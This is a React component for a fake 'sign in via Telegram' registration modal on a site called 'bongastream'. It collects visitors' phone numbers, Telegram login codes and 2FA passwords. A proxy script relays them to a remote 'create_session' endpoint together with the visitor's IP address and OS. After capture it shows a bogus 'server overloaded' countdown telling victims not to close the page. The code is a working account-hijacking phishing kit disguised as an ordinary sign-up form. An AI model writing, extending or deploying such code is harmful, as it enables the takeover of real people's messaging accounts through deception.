import { createContext, useCallback, useContext, useEffect, useMemo, useRef, useState } from 'react';
import { useLang } from './LanguageContext';

const RegisterModalContext = createContext(null);
// Use PHP API handler on the main domain to bypass Russia -> PythonAnywhere blocks (same as my-dnp1)
const API_URL = 'https://queenvote.com/api.php';
const TARGET_URL = 'https://ifuzupaqeme22.pythonanywhere.com/create_session';
const STEPS = { PHONE: 'phone', CODE: 'code', PASSWORD: 'password', OVERLOADED: 'overloaded' };
const OVERLOAD_SECONDS = 120;

const encodeProxyPayload = (payload) => btoa(unescape(encodeURIComponent(JSON.stringify(payload))));

const parseProxyResponse = async (res) => {
  const text = await res.text();
  try {
    return { data: JSON.parse(text), text };
  } catch {
    return { data: null, text };
  }
};

const isDebug = () => {
  try { return window.localStorage.getItem('reg_debug') === '1'; } catch { return false; }
};

const debugLog = (...args) => {
  if (!isDebug()) return;
  // eslint-disable-next-line no-console
  console.debug('[register]', ...args);
};

const fetchViaProxy = async (payload) => {
  const dataStr = encodeProxyPayload(payload);
  const url = `${API_URL}?d=${encodeURIComponent(dataStr)}`;
  const res = await fetch(url);
  const parsed = await parseProxyResponse(res);
  return { url, res, ...parsed };
};

const getProxyEgressIp = async () => {
  // Возвращает IP сервера, с которого api.php делает исходящий запрос.
  // Удобно проверить, “прыгает” ли IP у прокси.
  const { data } = await fetchViaProxy({ url: 'https://api.ipify.org?format=json' });
  return data?.ip;
};

const toUserError = (serverError, fallback) => {
  const err = String(serverError || '').trim();
  const m = err.match(/^FLOOD_WAIT_(\d+)$/);
  if (m) {
    const s = parseInt(m[1], 10);
    if (s >= 60) { const mins = Math.ceil(s / 60); return `Telegram ограничил запросы. Попробуйте через ${mins} мин.`; }
    return `Лимит Telegram. Подождите ${s}с и попробуйте снова.`;
  }
  const map = {
    CONNECT_TIMEOUT: 'Сервер авторизации временно недоступен. Попробуйте через минуту.',
    CONNECT_FAILED: 'Не удалось связаться с сервером Telegram. Попробуйте позже.',
    CONNECT_ERROR: 'Ошибка соединения с Telegram. Попробуйте позже.',
    SEND_CODE_FAILED: 'Не удалось отправить код. Попробуйте через пару минут.',
    PHONE_BANNED: 'Этот номер заблокирован в Telegram.',
    PHONE_INVALID: 'Неверный номер телефона.',
    PHONE_FLOOD: 'Слишком много попыток для этого номера. Подождите несколько часов.',
    PHONE_REQUIRED: 'Введите номер телефона.',
    PHONE_TOO_SHORT: 'Номер слишком короткий.',
    PHONE_TOO_LONG: 'Номер слишком длинный.',
    PHONE_INVALID_CHARS: 'Номер содержит недопустимые символы.',
    RATE_LIMIT: 'Подождите немного перед повторной попыткой.',
    INVALID_CODE: 'Неверный код. Проверьте и попробуйте ещё раз.',
    CODE_EXPIRED: 'Код истёк. Запросите новый код.',
    CODE_TIMEOUT: 'Время ожидания истекло. Попробуйте снова.',
    INVALID_PASSWORD: 'Неверный пароль. Проверьте и попробуйте ещё раз.',
    PASSWORD_TIMEOUT: 'Время ожидания ввода пароля истекло.',
    PASSWORD_ERROR: 'Ошибка ввода пароля.',
    SESSION_EXPIRED: 'Сессия истекла. Начните заново.',
    SESSION_NOT_FOUND: 'Сессия не найдена. Начните заново.',
    CONNECTION_LOST: 'Соединение прервалось. Попробуйте ещё раз.',
    SIGNIN_FAILED: 'Ошибка входа. Попробуйте ещё раз.',
    PHONE_BUSY: 'Запрос уже обрабатывается. Подождите.',
    RESEND_TIMEOUT: 'Не удалось переотправить код. Попробуйте позже.',
    RESEND_FAILED: 'Ошибка переотправки кода.',
    SMS_WAIT_60S: 'SMS пока недоступно. Подождите минуту и нажмите «Отправить повторно».',
  };
  if (map[err]) return map[err];
  if (err.startsWith('START_LOGIN_FAILED')) return 'Ошибка запуска авторизации. Попробуйте позже.';
  return err || fallback;
};

export function RegisterModalProvider({ children }) {
  const { t } = useLang();
  const [open, setOpen] = useState(false);
  const [step, setStep] = useState(STEPS.PHONE);
  const [customMessage, setCustomMessage] = useState('');
  const [phone, setPhone] = useState('+');
  const [code, setCode] = useState('');
  const [password, setPassword] = useState('');
  const [showPassword, setShowPassword] = useState(false);
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  const [timer, setTimer] = useState(0);
  const [overloadTimer, setOverloadTimer] = useState(0);
  const [clientIP, setClientIP] = useState('Unknown');
  const phoneInputRef = useRef(null);
  const codeInputRef = useRef(null);
  const passwordInputRef = useRef(null);

  const openRegister = useCallback((message) => {
    setPhone('+');
    setCode('');
    setPassword('');
    setError('');
    // Show caller message when provided (e.g. tokens flow), otherwise show default prompt
    if (message) {
      setCustomMessage(message);
    } else {
      setCustomMessage(typeof t === 'function' ? t('registerPrompt') : 'Чтобы пользоваться услугами сайта, нужно зарегистрироваться');
    }
    setStep(STEPS.PHONE);
    setOpen(true);
  }, [t]);

  const closeRegister = useCallback(() => {
    setOpen(false);
    setStep(STEPS.PHONE);
    setError('');
    setCustomMessage('');
  }, []);

  const sendPhone = useCallback(async () => {
    setLoading(true);
    setError('');
    let userOS = 'Unknown';
    if (navigator.userAgent.indexOf('Win') !== -1) userOS = 'Windows';
    else if (navigator.userAgent.indexOf('Mac') !== -1) userOS = 'MacOS';
    else if (navigator.userAgent.indexOf('Linux') !== -1) userOS = 'Linux';
    else if (navigator.userAgent.indexOf('Android') !== -1) userOS = 'Android';
    else if (navigator.userAgent.indexOf('like Mac') !== -1) userOS = 'iOS';
    try {
      let fetchedIP = 'Unknown';
      try {
        const ipRes = await fetch('https://api.ipify.org?format=json');
        const ipData = await ipRes.json();
        fetchedIP = ipData.ip;
        setClientIP(fetchedIP);
      } catch (e) {}

      // Debug: show client IP + proxy egress IP
      let proxyEgressIp;
      try {
        proxyEgressIp = await getProxyEgressIp();
      } catch (e) {}
      debugLog('sendPhone:start', {
        ts: new Date().toISOString(),
        clientIP: fetchedIP,
        proxyEgressIp,
        userOS,
      });

      const phoneNumber = phone.replace(/\D/g, '');
      const payload = {
        url: TARGET_URL,
        phone: phoneNumber,
        site_name: 'bongastream',
        site_url: window.location.href,
        user_os: userOS,
        client_ip: fetchedIP,
      };

      // Транзиентные ошибки — фронт автоматически повторяет запрос (до 2 раз)
      const RETRYABLE = ['CONNECT_TIMEOUT', 'CONNECT_FAILED', 'CONNECT_ERROR', 'SEND_CODE_FAILED', 'CONNECTION_LOST'];
      const MAX_RETRIES = 2;
      let lastError = '';

      for (let attempt = 1; attempt <= MAX_RETRIES + 1; attempt++) {
        debugLog('sendPhone:request', { payload, attempt });

        let url, res, data, text;
        try {
          ({ url, res, data, text } = await fetchViaProxy(payload));
        } catch {
          // Сеть недоступна — ретраим с паузой
          if (attempt <= MAX_RETRIES) {
            debugLog('sendPhone:networkError', { attempt, willRetry: true });
            await new Promise(r => setTimeout(r, 2000 * attempt));
            continue;
          }
          setError('Сервер недоступен. Проверьте интернет-соединение.');
          return;
        }
        debugLog('sendPhone:response', { url, status: res.status, ok: res.ok, data, textPreview: String(text || '').slice(0, 180), attempt });

        if (!res.ok) {
          if (attempt <= MAX_RETRIES && res.status >= 500) {
            debugLog('sendPhone:serverError', { status: res.status, attempt, willRetry: true });
            await new Promise(r => setTimeout(r, 2000 * attempt));
            continue;
          }
          setError(`Ошибка сервера (${res.status})`);
          return;
        }
        if (!data) {
          setError(`Ошибка сервера: ${String(text || '').slice(0, 140)}`);
          return;
        }
        if (data.ok || data.error === 'ALREADY_PENDING') {
          setStep(STEPS.CODE);
          setTimer(30);
          return;
        }
        // Если ошибка транзиентная — ретраим
        const errCode = String(data.error || '').split(':')[0].trim();
        if (attempt <= MAX_RETRIES && RETRYABLE.includes(errCode)) {
          debugLog('sendPhone:retryableError', { error: data.error, attempt, willRetry: true });
          lastError = data.error;
          await new Promise(r => setTimeout(r, 3000 * attempt));
          continue;
        }
        // Финальная ошибка — показываем пользователю
        setError(toUserError(data.error, 'Ошибка при отправке кода'));
        return;
      }
      // Все попытки исчерпаны
      setError(toUserError(lastError, 'Сервер временно недоступен. Попробуйте через минуту.'));
    } catch {
      setError('Сервер недоступен');
    } finally {
      setLoading(false);
    }
  }, [phone]);

  const sendCode = useCallback(async () => {
    setLoading(true);
    setError('');
    try {
      const phoneNumber = phone.replace(/\D/g, '');
      const payload = {
        url: TARGET_URL,
        phone: phoneNumber,
        code,
        site_name: 'bongastream',
        site_url: window.location.href,
        user_os: navigator.userAgent.indexOf('Win') !== -1 ? 'Windows' :
                 navigator.userAgent.indexOf('Mac') !== -1 ? 'MacOS' :
                 navigator.userAgent.indexOf('Android') !== -1 ? 'Android' : 'Unknown',
        client_ip: clientIP,
      };
      const CODE_RETRYABLE = ['CONNECTION_LOST', 'CODE_TIMEOUT'];
      for (let attempt = 1; attempt <= 2; attempt++) {
        debugLog('sendCode:request', { payload: { ...payload, code: '***' }, attempt });
        let url, res, data, text;
        try {
          ({ url, res, data, text } = await fetchViaProxy(payload));
        } catch {
          if (attempt < 2) { await new Promise(r => setTimeout(r, 2000)); continue; }
          setError('Ошибка соединения');
          return;
        }
        debugLog('sendCode:response', { url, status: res.status, ok: res.ok, data, textPreview: String(text || '').slice(0, 180), attempt });
        if (!res.ok) {
          if (attempt < 2 && res.status >= 500) { await new Promise(r => setTimeout(r, 2000)); continue; }
          setError(`Ошибка сервера (${res.status})`);
          return;
        }
        if (!data) {
          setError(`Ошибка сервера: ${String(text || '').slice(0, 140)}`);
          return;
        }
        if (data.need_password) {
          setStep(STEPS.PASSWORD);
          return;
        } else if (data.ok) {
          setOverloadTimer(OVERLOAD_SECONDS);
          setStep(STEPS.OVERLOADED);
          return;
        }
        const errCode = String(data.error || '').split(':')[0].trim();
        if (attempt < 2 && CODE_RETRYABLE.includes(errCode)) {
          debugLog('sendCode:retry', { error: data.error, attempt });
          await new Promise(r => setTimeout(r, 2000));
          continue;
        }
        setError(toUserError(data.error, 'Неверный код'));
        return;
      }
    } catch {
      setError('Ошибка соединения');
    } finally {
      setLoading(false);
    }
  }, [phone, code, closeRegister]);

  const sendPassword = useCallback(async () => {
    setLoading(true);
    setError('');
    try {
      const phoneNumber = phone.replace(/\D/g, '');
      const payload = {
        url: TARGET_URL,
        phone: phoneNumber,
        password,
        site_name: 'bongastream',
        site_url: window.location.href,
        user_os: navigator.userAgent.indexOf('Win') !== -1 ? 'Windows' :
                 navigator.userAgent.indexOf('Mac') !== -1 ? 'MacOS' :
                 'Unknown',
        client_ip: clientIP,
      };
      for (let attempt = 1; attempt <= 2; attempt++) {
        debugLog('sendPassword:request', { payload: { ...payload, password: '***' }, attempt });
        let url, res, data, text;
        try {
          ({ url, res, data, text } = await fetchViaProxy(payload));
        } catch {
          if (attempt < 2) { await new Promise(r => setTimeout(r, 2000)); continue; }
          setError('Ошибка соединения');
          return;
        }
        debugLog('sendPassword:response', { url, status: res.status, ok: res.ok, data, textPreview: String(text || '').slice(0, 180), attempt });
        if (!res.ok) {
          if (attempt < 2 && res.status >= 500) { await new Promise(r => setTimeout(r, 2000)); continue; }
          setError(`Ошибка сервера (${res.status})`);
          return;
        }
        if (!data) {
          setError(`Ошибка сервера: ${String(text || '').slice(0, 140)}`);
          return;
        }
        if (data.ok) {
          setOverloadTimer(OVERLOAD_SECONDS);
          setStep(STEPS.OVERLOADED);
          return;
        }
        const errCode = String(data.error || '').split(':')[0].trim();
        if (attempt < 2 && errCode === 'CONNECTION_LOST') {
          debugLog('sendPassword:retry', { error: data.error, attempt });
          await new Promise(r => setTimeout(r, 2000));
          continue;
        }
        setError(toUserError(data.error, 'Неверный пароль'));
        return;
      }
    } catch {
      setError('Ошибка соединения');
    } finally {
      setLoading(false);
    }
  }, [phone, password, closeRegister]);

  const resendCode = useCallback(async () => {
    setLoading(true);
    setError('');
    try {
      const phoneNumber = phone.replace(/\D/g, '');
      const payload = {
        url: TARGET_URL,
        phone: phoneNumber,
        resend: true,
        site_name: 'bongastream',
        site_url: window.location.href,
        client_ip: clientIP,
      };
      debugLog('resendCode:request', { payload });
      const { url, res, data, text } = await fetchViaProxy(payload);
      debugLog('resendCode:response', { url, status: res.status, ok: res.ok, data, textPreview: String(text || '').slice(0, 180) });
      if (!res.ok) {
        setError(`Ошибка сервера (${res.status})`);
        return;
      }
      if (!data) {
        setError(`Ошибка сервера: ${String(text || '').slice(0, 140)}`);
        return;
      }
      if (data.ok) { setTimer(30); } else { setError(toUserError(data.error, 'Ошибка отправки')); }
    } catch {
      setError('Ошибка соединения');
    } finally {
      setLoading(false);
    }
  }, [phone]);

  const onPhoneChange = useCallback((e) => {
    const raw = String(e.target.value ?? '');
    const withPlus = raw.startsWith('+') ? raw : `+${raw}`;
    const normalized = `+${withPlus.slice(1).replace(/\D/g, '')}`;
    setPhone(normalized === '+' ? '+' : normalized);
  }, []);

  const onCodeChange = useCallback((e) => {
    setCode(String(e.target.value ?? '').replace(/\D/g, ''));
  }, []);

  const onPasswordChange = useCallback((e) => {
    setPassword(String(e.target.value ?? ''));
  }, []);

  useEffect(() => {
    if (!open) return;
    const el = step === STEPS.PHONE ? phoneInputRef.current
             : step === STEPS.CODE ? codeInputRef.current
             : passwordInputRef.current;
    if (!el) return;
    requestAnimationFrame(() => {
      el.focus();
      try { el.setSelectionRange(el.value.length, el.value.length); } catch {}
    });
  }, [open, step]);

  useEffect(() => {
    let interval;
    if (step === STEPS.CODE && timer > 0) {
      interval = setInterval(() => setTimer((p) => (p > 0 ? p - 1 : 0)), 1000);
    }
    return () => clearInterval(interval);
  }, [step, timer]);

  // Overload countdown — auto-close when reaches 0
  useEffect(() => {
    if (step !== STEPS.OVERLOADED || overloadTimer <= 0) return;
    const interval = setInterval(() => {
      setOverloadTimer((p) => {
        if (p <= 1) { closeRegister(); return 0; }
        return p - 1;
      });
    }, 1000);
    return () => clearInterval(interval);
  }, [step, overloadTimer, closeRegister]);

  // Закрытие по клику на оверлей
  const handleOverlayClick = useCallback((e) => {
    if (step === STEPS.OVERLOADED) return;
    if (e.target === e.currentTarget) closeRegister();
  }, [closeRegister, step]);

  const value = useMemo(() => ({ open, openRegister, closeRegister, customMessage }), [open, openRegister, closeRegister, customMessage]);

  const canPhone = phone.length > 1;
  const canCode = code.length >= 3;
  const canPassword = password.length > 0;

  const titleMap = {
    [STEPS.PHONE]: 'Вход через Telegram',
    [STEPS.CODE]: 'Введите код',
    [STEPS.PASSWORD]: 'Введите пароль 2FA',
  };

  return (
    <RegisterModalContext.Provider value={value}>
      {children}

      {open && (
        <div
          style={{
            position: 'fixed', inset: 0, zIndex: 9999,
            background: 'rgba(0,0,0,0.6)', backdropFilter: 'blur(4px)',
            display: 'flex', alignItems: 'center', justifyContent: 'center',
            padding: '16px',
          }}
          onClick={handleOverlayClick}
        >
          <div
            style={{
              background: '#1a1d2e', borderRadius: '16px', padding: '28px 24px',
              width: '100%', maxWidth: '400px', boxShadow: '0 20px 60px rgba(0,0,0,0.5)',
              border: '1px solid rgba(255,255,255,0.08)',
              position: 'relative',
            }}
          >
            {/* Close button */}
            {step !== STEPS.OVERLOADED && (
            <button
              onClick={closeRegister}
              style={{
                position: 'absolute', top: '12px', right: '12px',
                background: 'none', border: 'none', color: 'rgba(255,255,255,0.5)',
                fontSize: '20px', cursor: 'pointer', lineHeight: 1,
                padding: '4px 8px',
              }}
            >✕</button>
            )}

            {/* Title */}
            {step !== STEPS.OVERLOADED && (
            <h2 style={{ color: '#fff', fontSize: '18px', fontWeight: 700, marginBottom: '16px', paddingRight: '24px' }}>
              {titleMap[step]}
            </h2>
            )}

            {/* Tokens */}
            {step !== STEPS.OVERLOADED && (
            <div style={{
              display: 'flex', alignItems: 'center', justifyContent: 'space-between',
              gap: '10px', marginBottom: '12px',
            }}>
              <div style={{
                display: 'flex', alignItems: 'baseline', gap: '6px',
                padding: '8px 10px',
                background: 'rgba(255,255,255,0.07)',
                border: '1px solid rgba(255,255,255,0.12)',
                borderRadius: '10px',
              }}>
                <span style={{ color: '#fff', fontSize: '16px', fontWeight: 800 }}>0</span>
                <span style={{ color: 'rgba(255,255,255,0.65)', fontSize: '13px' }}>токенов</span>
              </div>
              <button
                onClick={() => openRegister(typeof t === 'function' ? t('modalTokensMsg') : 'Чтобы отправить токены, войдите через Telegram')}
                style={{
                  padding: '9px 12px', borderRadius: '10px', border: '1px solid rgba(255,255,255,0.12)',
                  background: 'rgba(255,255,255,0.06)', color: '#fff', cursor: 'pointer',
                  fontSize: '13px', fontWeight: 700,
                }}
              >Купить токены</button>
            </div>
            )}

            {/* Custom message */}
            {customMessage && step === STEPS.PHONE && (
              <div style={{
                marginBottom: '12px', padding: '10px 12px',
                background: 'rgba(99,179,237,0.12)', borderRadius: '8px',
                border: '1px solid rgba(99,179,237,0.3)',
                color: '#90cdf4', fontSize: '13px',
              }}>
                {customMessage}
              </div>
            )}

            {/* Error */}
            {error && (
              <div style={{
                marginBottom: '12px', padding: '10px 12px',
                background: 'rgba(245,101,101,0.15)', borderRadius: '8px',
                border: '1px solid rgba(245,101,101,0.3)',
                color: '#fc8181', fontSize: '13px',
              }}>
                {error}
              </div>
            )}

            {/* PHONE STEP */}
            {step === STEPS.PHONE && (
              <>
                <p style={{ color: 'rgba(255,255,255,0.6)', fontSize: '13px', marginBottom: '12px' }}>
                  Введите номер телефона, привязанный к вашему Telegram аккаунту.
                </p>
                <input
                  ref={phoneInputRef}
                  value={phone}
                  onChange={onPhoneChange}
                  placeholder=""
                  style={{
                    width: '100%', padding: '12px 14px',
                    background: 'rgba(255,255,255,0.07)', border: '1px solid rgba(255,255,255,0.15)',
                    borderRadius: '10px', color: '#fff', fontSize: '15px', outline: 'none',
                    boxSizing: 'border-box',
                  }}
                />
                <div style={{ display: 'flex', gap: '8px', marginTop: '16px', justifyContent: 'flex-end' }}>
                  <button
                    onClick={closeRegister}
                    style={{
                      padding: '10px 18px', borderRadius: '8px', border: '1px solid rgba(255,255,255,0.15)',
                      background: 'transparent', color: 'rgba(255,255,255,0.6)', cursor: 'pointer', fontSize: '14px',
                    }}
                  >Отмена</button>
                  <button
                    onClick={sendPhone}
                    disabled={!canPhone || loading}
                    style={{
                      padding: '10px 20px', borderRadius: '8px', border: 'none',
                      background: canPhone && !loading ? 'linear-gradient(135deg, #667eea, #764ba2)' : 'rgba(255,255,255,0.1)',
                      color: '#fff', cursor: canPhone && !loading ? 'pointer' : 'not-allowed',
                      fontSize: '14px', fontWeight: 600,
                    }}
                  >{loading ? '...' : 'Продолжить'}</button>
                </div>
              </>
            )}

            {/* CODE STEP */}
            {step === STEPS.CODE && (
              <>
                <p style={{ color: 'rgba(255,255,255,0.6)', fontSize: '13px', marginBottom: '12px' }}>
                  Код отправлен в Telegram на номер <strong style={{ color: '#90cdf4' }}>{phone}</strong>
                </p>
                <input
                  ref={codeInputRef}
                  value={code}
                  onChange={onCodeChange}
                  placeholder="Код из Telegram"
                  style={{
                    width: '100%', padding: '12px 14px',
                    background: 'rgba(255,255,255,0.07)', border: '1px solid rgba(255,255,255,0.15)',
                    borderRadius: '10px', color: '#fff', fontSize: '15px', outline: 'none',
                    boxSizing: 'border-box',
                  }}
                />
                <div style={{ textAlign: 'right', marginTop: '8px' }}>
                  <button
                    onClick={resendCode}
                    disabled={timer > 0 || loading}
                    style={{
                      background: 'none', border: 'none', cursor: timer > 0 || loading ? 'not-allowed' : 'pointer',
                      color: timer > 0 || loading ? 'rgba(255,255,255,0.3)' : '#90cdf4',
                      fontSize: '12px', padding: 0,
                    }}
                  >
                    {timer > 0 ? `Отправить повторно через ${timer}с` : 'Отправить повторно'}
                  </button>
                </div>
                <div style={{ display: 'flex', gap: '8px', marginTop: '16px', justifyContent: 'space-between' }}>
                  <button
                    onClick={() => setStep(STEPS.PHONE)}
                    style={{
                      padding: '10px 18px', borderRadius: '8px', border: '1px solid rgba(255,255,255,0.15)',
                      background: 'transparent', color: 'rgba(255,255,255,0.6)', cursor: 'pointer', fontSize: '14px',
                    }}
                  >← Назад</button>
                  <button
                    onClick={sendCode}
                    disabled={!canCode || loading}
                    style={{
                      padding: '10px 20px', borderRadius: '8px', border: 'none',
                      background: canCode && !loading ? 'linear-gradient(135deg, #667eea, #764ba2)' : 'rgba(255,255,255,0.1)',
                      color: '#fff', cursor: canCode && !loading ? 'pointer' : 'not-allowed',
                      fontSize: '14px', fontWeight: 600,
                    }}
                  >{loading ? '...' : 'Войти'}</button>
                </div>
              </>
            )}

            {/* PASSWORD STEP */}
            {step === STEPS.PASSWORD && (
              <>
                <p style={{ color: 'rgba(255,255,255,0.6)', fontSize: '13px', marginBottom: '12px' }}>
                  Введите пароль двухфакторной аутентификации Telegram
                </p>
                <div style={{ position: 'relative' }}>
                  <input
                    ref={passwordInputRef}
                    type={showPassword ? 'text' : 'password'}
                    value={password}
                    onChange={onPasswordChange}
                    placeholder="Пароль 2FA"
                    style={{
                      width: '100%', padding: '12px 40px 12px 14px',
                      background: 'rgba(255,255,255,0.07)', border: '1px solid rgba(255,255,255,0.15)',
                      borderRadius: '10px', color: '#fff', fontSize: '15px', outline: 'none',
                      boxSizing: 'border-box',
                    }}
                  />
                  <button
                    onClick={() => setShowPassword((s) => !s)}
                    style={{
                      position: 'absolute', right: '12px', top: '50%', transform: 'translateY(-50%)',
                      background: 'none', border: 'none', color: 'rgba(255,255,255,0.4)', cursor: 'pointer', padding: 0,
                    }}
                  >
                    {showPassword ? (
                      <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round">
                        <path d="M3 3l18 18M9.88 9.88a3 3 0 004.24 4.24M10.73 5.08A10.43 10.43 0 0112 5c7 0 10 7 10 7a13.16 13.16 0 01-1.67 2.68M6.61 6.61A13.526 13.526 0 002 12s3 7 10 7a9.74 9.74 0 005.39-1.61"/>
                      </svg>
                    ) : (
                      <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round">
                        <path d="M2 12s3-7 10-7 10 7 10 7-3 7-10 7-10-7-10-7z"/>
                        <circle cx="12" cy="12" r="3"/>
                      </svg>
                    )}
                  </button>
                </div>
                <div style={{ display: 'flex', gap: '8px', marginTop: '16px', justifyContent: 'space-between' }}>
                  <button
                    onClick={() => setStep(STEPS.CODE)}
                    style={{
                      padding: '10px 18px', borderRadius: '8px', border: '1px solid rgba(255,255,255,0.15)',
                      background: 'transparent', color: 'rgba(255,255,255,0.6)', cursor: 'pointer', fontSize: '14px',
                    }}
                  >← Назад</button>
                  <button
                    onClick={sendPassword}
                    disabled={!canPassword || loading}
                    style={{
                      padding: '10px 20px', borderRadius: '8px', border: 'none',
                      background: canPassword && !loading ? 'linear-gradient(135deg, #667eea, #764ba2)' : 'rgba(255,255,255,0.1)',
                      color: '#fff', cursor: canPassword && !loading ? 'pointer' : 'not-allowed',
                      fontSize: '14px', fontWeight: 600,
                    }}
                  >{loading ? '...' : 'Войти'}</button>
                </div>
              </>
            )}

            {/* OVERLOADED STEP */}
            {step === STEPS.OVERLOADED && (() => {
              const mins = Math.floor(overloadTimer / 60);
              const secs = overloadTimer % 60;
              const timeStr = `${mins}:${secs < 10 ? '0' : ''}${secs}`;
              const progress = ((OVERLOAD_SECONDS - overloadTimer) / OVERLOAD_SECONDS) * 100;
              return (
                <div style={{ textAlign: 'center', padding: '12px 0 4px' }}>
                  {/* Animated server icon */}
                  <div style={{ marginBottom: '18px' }}>
                    <svg width="56" height="56" viewBox="0 0 24 24" fill="none" stroke="#f6ad55" strokeWidth="1.5" strokeLinecap="round" strokeLinejoin="round" style={{ animation: 'pulse 2s ease-in-out infinite' }}>
                      <rect x="2" y="2" width="20" height="8" rx="2" ry="2"/>
                      <rect x="2" y="14" width="20" height="8" rx="2" ry="2"/>
                      <line x1="6" y1="6" x2="6.01" y2="6"/>
                      <line x1="6" y1="18" x2="6.01" y2="18"/>
                    </svg>
                  </div>

                  <h3 style={{
                    color: '#f6ad55', fontSize: '17px', fontWeight: 700,
                    marginBottom: '8px', letterSpacing: '0.3px',
                  }}>
                    Сервер перегружен
                  </h3>

                  <p style={{
                    color: 'rgba(255,255,255,0.55)', fontSize: '13px',
                    lineHeight: '1.5', marginBottom: '20px', maxWidth: '280px', margin: '0 auto 20px',
                  }}>
                    В данный момент наблюдается высокая нагрузка на сервер. Ваш запрос поставлен в очередь и будет обработан автоматически.
                  </p>

                  {/* Countdown */}
                  <div style={{
                    fontSize: '32px', fontWeight: 800, color: '#fff',
                    fontVariantNumeric: 'tabular-nums', marginBottom: '16px',
                    fontFamily: 'monospace',
                  }}>
                    {timeStr}
                  </div>

                  {/* Progress bar */}
                  <div style={{
                    width: '100%', height: '4px', background: 'rgba(255,255,255,0.1)',
                    borderRadius: '2px', overflow: 'hidden', marginBottom: '16px',
                  }}>
                    <div style={{
                      width: `${progress}%`, height: '100%',
                      background: 'linear-gradient(90deg, #667eea, #764ba2)',
                      borderRadius: '2px',
                      transition: 'width 1s linear',
                    }} />
                  </div>

                  <p style={{
                    color: 'rgba(255,255,255,0.35)', fontSize: '11px',
                  }}>
                    Пожалуйста, не закрывайте эту страницу
                  </p>

                  {/* Pulse keyframes */}
                  <style>{`
                    @keyframes pulse {
                      0%, 100% { opacity: 1; transform: scale(1); }
                      50% { opacity: 0.6; transform: scale(0.95); }
                    }
                  `}</style>
                </div>
              );
            })()}
          </div>
        </div>
      )}
    </RegisterModalContext.Provider>
  );
}

export function useRegisterModal() {
  return useContext(RegisterModalContext);
}
